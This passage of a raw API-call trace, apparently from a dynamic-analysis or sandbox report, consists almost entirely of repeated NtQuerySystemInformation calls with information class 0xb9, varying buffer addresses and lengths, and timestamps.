NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.358] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0272.360] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0272.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0272.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0272.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0272.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.361] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x28, ResultLength=0x0) [0272.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0272.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc800, Length=0x20, ResultLength=0x0) [0272.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc780, Length=0x20, ResultLength=0x0) [0272.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc780, Length=0x20, ResultLength=0x0) [0272.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.366] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc780, Length=0x20, ResultLength=0x0) [0272.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0272.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0272.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0272.367] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0272.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0272.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0272.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0272.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0272.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0272.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0272.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc870, Length=0x28, ResultLength=0x0) [0272.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8e0, Length=0x28, ResultLength=0x0) [0272.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0272.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.373] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc960, Length=0x28, ResultLength=0x0) [0272.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.377] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0272.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0272.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x20, ResultLength=0x0) [0272.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x38, ResultLength=0x0) [0272.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x20, ResultLength=0x0) [0272.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0272.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc850, Length=0x20, ResultLength=0x0) [0272.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb20, Length=0x58, ResultLength=0x0) [0272.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0272.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0272.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0272.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc840, Length=0x28, ResultLength=0x0) [0272.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8b0, Length=0x28, ResultLength=0x0) [0272.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.392] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc7a0, Length=0x20, ResultLength=0x0) [0272.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0272.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0272.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc720, Length=0x20, ResultLength=0x0) [0272.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc970, Length=0x20, ResultLength=0x0) [0272.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0272.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc810, Length=0x20, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca00, Length=0x38, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc820, Length=0x20, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc820, Length=0x20, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd88, Length=0x50, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.397] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0272.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0272.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0272.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0272.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0272.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0272.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x28, ResultLength=0x0) [0272.405] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbd0, Length=0x28, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x20, ResultLength=0x0) [0272.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x38, ResultLength=0x0) [0272.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, 